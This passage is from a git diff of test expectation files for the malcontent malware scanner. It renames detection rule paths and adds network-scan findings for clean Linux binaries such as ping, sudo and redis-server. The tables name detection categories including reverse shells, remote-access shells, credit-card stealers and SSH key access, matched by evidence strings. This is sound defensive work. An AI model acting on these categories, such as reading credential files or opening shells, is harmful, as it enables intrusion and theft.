[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index 9a3b9ab45..f2f50ce2f 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -5,6 +5,7 @@ | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple index 26472bd5f..0f4a608e6 100644 --- a/tests/linux/clean/pulumi.simple +++ b/tests/linux/clean/pulumi.simple @@ -46,7 +46,7 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium exec/cmd: medium exec/conditional/LANG: low exec/install_additional/pip_install: medium diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple index 00f118f0f..362414c5c 100644 --- a/tests/linux/clean/pypi_package_index.json.simple +++ b/tests/linux/clean/pypi_package_index.json.simple @@ -111,6 +111,7 @@ evasion/bypass_security/linux/ufw: medium evasion/logging/acct: low evasion/process_injection/ptrace: medium evasion/process_injection/readelf: medium +evasion/rootkit/refs: medium exec/dylib/symbol_address: medium exec/install_additional/pip_install: high exec/plugin: low @@ -152,10 +153,10 @@ impact/remote_access/net_shell: high impact/remote_access/reverse_shell: high impact/remote_access/trojan: medium impact/rootkit: low -impact/rootkit/refs: medium impact/ui/screen_capture: high impact/ui/x11_auth: medium lateral/scan/brute_force: low +lateral/scan/tool: high net/dns/over_https: medium net/download: medium net/http/auth: low diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index f7d0f95b6..dc3add18d 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -10,7 +10,7 @@ | MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [/.ssh/config](https://github.com/search?q=%2F.ssh%2Fconfig&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | @@ -29,7 +29,7 @@ | MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | | MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 300e3d50b..9e4875559 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -16,6 +16,7 @@ | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple index a941c2be7..eede552e9 100644 --- a/tests/linux/clean/rules.json.simple +++ b/tests/linux/clean/rules.json.simple @@ -26,8 +26,8 @@ discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/var_run: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low @@ -55,6 +55,7 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium +lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/runtime-security-fentry.o.simple b/tests/linux/clean/runtime-security-fentry.o.simple index c320ec689..9513547c8 100644 --- a/tests/linux/clean/runtime-security-fentry.o.simple +++ b/tests/linux/clean/runtime-security-fentry.o.simple @@ -17,6 +17,7 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium +lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple index 9abc1e818..fdfff6f56 100644 --- a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple +++ b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple @@ -18,6 +18,7 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium +lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/runtime-security.o.simple b/tests/linux/clean/runtime-security.o.simple index a00a6c4c9..741309cab 100644 --- a/tests/linux/clean/runtime-security.o.simple +++ b/tests/linux/clean/runtime-security.o.simple @@ -17,6 +17,7 @@ fs/permission/chown: low fs/permission/modify: medium fs/unmount: low impact/remote_access/net_exec: medium +lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/parse: medium diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple index 37d595af0..fefb0d049 100644 --- a/tests/linux/clean/searchindex.json.simple +++ b/tests/linux/clean/searchindex.json.simple @@ -12,8 +12,9 @@ data/random/insecure: low discover/components/docker: medium discover/system/platform: low discover/system/sysinfo: medium -evasion/covert_location/chdir_unusual: medium -evasion/hide_artifacts/system_directories: medium +evasion/file/location/chdir_unusual: medium +evasion/file/location/system_directories: medium +evasion/rootkit/refs: medium exec/install_additional/package_install: medium exec/install_additional/pip_install: medium exec/plugin: low @@ -43,7 +44,6 @@ impact/remote_access/backdoor: high impact/remote_access/reverse_shell: medium impact/remote_access/trojan: medium impact/rootkit: medium -impact/rootkit/refs: medium net/dns/servers: low net/dns/txt: low net/download/fetch: medium diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index fea449489..1d262642c 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -29,8 +29,8 @@ | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | -| MEDIUM | [evasion/covert_location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | +| MEDIUM | [evasion/file/location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | @@ -86,6 +86,7 @@ | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | | MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -175,6 +176,5 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 290ed36cd..1129120a1 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -13,8 +13,8 @@ discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low -evasion/covert_location/dev_shm: medium -evasion/hidden_paths/var_run: medium +evasion/file/location/dev_shm: medium +evasion/file/location/var_run: medium evasion/hide_artifacts/pivot_root: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/logging/acct: low diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple index dfa4e21ef..309d055f6 100644 --- a/tests/linux/clean/sonarlint-metadata.json.simple +++ b/tests/linux/clean/sonarlint-metadata.json.simple @@ -13,8 +13,8 @@ crypto/uuid: medium data/encoding/json_decode: low data/encoding/json_encode: low discover/network/interface_list: medium -evasion/covert_location/dev_mqueue: medium -evasion/hidden_paths/hidden: medium +evasion/file/location/dev_mqueue: medium +evasion/file/prefix: medium exec/plugin: low exfil/stealer/credit_card: medium fs/file/copy: medium @@ -37,6 +37,7 @@ impact/exploit: medium impact/infection/infected: medium impact/remote_access/agent: medium lateral/scan/brute_force: low +lateral/scan/tool: medium net/download: medium net/http/2: low net/http/cookies: medium diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 50c4fb0a8..5870618b0 100644 --- a/tests/linux/clean/sudo.simple +++ b/tests/linux/clean/sudo.simple @@ -4,8 +4,8 @@ discover/network/interface_list: medium discover/system/cpu_info: low discover/system/hostname_get: low discover/user/HOME: low -evasion/hidden_paths/hidden: medium -evasion/hidden_paths/var_tmp: medium +evasion/file/location/var_tmp: medium +evasion/file/prefix: medium evasion/process_injection/ptrace: medium exec/plugin: low exec/program: medium @@ -28,6 +28,7 @@ fs/permission/chown: low fs/proc/arbitrary_pid: medium fs/proc/pid_exe: medium fs/tempdir/tempfile_create: low +lateral/scan/tool: medium net/ip/string: medium net/socket/listen: medium net/socket/local_addr: low diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple index 5190dad6d..79e3feebe 100644 --- a/tests/linux/clean/tracer.o.aarch64.simple +++ b/tests/linux/clean/tracer.o.aarch64.simple @@ -6,6 +6,7 @@ discover/network/netstat: medium evasion/bypass_security/linux/iptables: medium evasion/logging/acct: low impact/remote_access/heartbeat: medium +lateral/scan/tool: medium net/http/post: medium net/ip/multicast_send: low net/ip/syncookie: medium diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index 80a679dae..41eb959b5 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md @@ -1,46 +1,47 @@ ## linux/clean/tree-sitter [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|-------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------